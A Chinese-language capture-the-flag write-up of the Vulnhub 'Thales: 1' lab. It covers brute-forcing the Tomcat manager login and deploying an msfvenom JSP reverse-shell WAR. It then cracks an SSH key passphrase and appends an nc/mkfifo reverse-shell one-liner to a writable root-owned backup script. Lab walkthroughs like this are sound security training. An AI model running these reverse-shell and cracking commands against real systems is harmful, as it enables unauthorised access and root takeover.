首页 > 其他分享 >Thales: 1-vulnhub靶场

Thales: 1-vulnhub靶场

时间:2022-08-30 08:59:22浏览次数:79  
标签:shell 爆破 tomcat Thales 192.168 vulnhub 私钥 靶场 war

环境信息

靶机:192.168.124.150
攻击机:192.168.124.129

打靶过程

nmap 扫描端口及服务

image

发现开放了 22,8080 端口
访问 8080 是 apache tomcat 欢迎页面

image

目录扫描

目录扫描未发现扫描有用信息
image

tomcat 登录爆破

因为 tomcat 有管理登录页面,于是尝试爆破

image

image

成功爆破出 tomcat 账号密码为 tomcat:role1

上传 war 包反弹 shell

登录后,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.124.129 LPORT=9999 -f war -o revshell.war

image

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

image

image

发现 ssh 私钥

在 thales 家目录下发现了两个文件,user.txt 无访问权限,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

image

image

image

并且在 thales 家目录下查看所有文件,发现了 ssh 私钥文件

image
image

爆破私钥得到密码

将私钥文件下载到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

image

那么 su 到 thales 用户

image

发现了第一个 flag

image

提权

想到给我们的脚本还没用上,查看脚本,该脚本是 root 用户创建的,且我们有读、写、执行权限

image

image

于是插入反弹 shell 命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.124.129 6666 >/tmp/f" >> backup.sh

image

攻击机监听一会儿后成功反弹提权至 root

image

获取 flag

image

总结

1.tomcat 登录爆破
2.私钥爆破
3.脚本反弹 shell

标签:shell,爆破,tomcat,Thales,192.168,vulnhub,私钥,靶场,war
From: https://www.cnblogs.com/r0ure/p/16636598.html

相关文章

  • 文件上传靶场
    1-3文件上传漏洞第一关查看源代码js前端验证   上传查看回显效果   先上传php木马,提示不能上传;只能上传jpg、png、gif为后缀得文件,那么把木马文件得php......
  • 文件上传靶场11-16(修改)
    11-16文件上传靶场第11关   提示只允许上传jpg、png、gif类型   第十二关解题思路: Pass-11的防护方法是将出现在黑名单中的后缀名替换成空白字符串,但无......
  • sqli-labs靶场渗透
    环境搭建将下载好的sqlilabs解压到phpstudy的www目录转到sqlilabs项目的sql-connections目录,用记事本打开db-creds.inc文件,将$dbuser和$dbpass的值修改成mysql数据库的......
  • Vulnhub | DC-9
    信息搜集arp-l发现真实IP是192.168.6.97nmap-sS192.168.6.97开启22和80端口访问页面  SQL注入页面有一个搜索框,尝试SQL注入MaryMary'or1=1#Mary......
  • Vulnhub | DC-7
    主机发现信息搜集开放80,22端口 访问Web页面,熟悉的CMS有个搜索框,尝试了半天无果,自习看一下页面内容提示大概意思是说要用一些非常规的思路最后发现是在下面......
  • Vulnhub | DC-8
    信息搜集通过寻找真实IP和端口扫描发现开放22和80端口访问页面,发现是和DC1的cms一样   漏洞发现-SQL注入点击选项时,发现url后加了“nid=1”加个',发现数据......
  • ica:1-vulnhub靶场
    环境信息靶机:192.168.124.149攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放22,80,3306,33060端口访问80端口是一个登录页面,且发现使用了qdpm项目管......
  • Vulnhub | DC-6
    信息搜集主机发现、端口扫描 访问80端口,域名自动解析‘wordy’在本地和kali的hosts文件写入192.168.0.141wordyWeb渗透后台爆破 用了wordpress的cms用Ka......
  • Noob: 1-vulnhub靶场
    环境信息靶机:192.168.124.148攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放了21,80,55077端口,且存在ftp匿名访问访问80端口,是一个登录页面ftp匿......
  • Vulnhub | DC-4
    信息搜集通过mac地址找真实IP地址 真实IP为192.168.0.151,开放端口80,22 爆破密码 访问后是一个登录框,爆破尝试admin/happy访问后是一个登录框,爆破......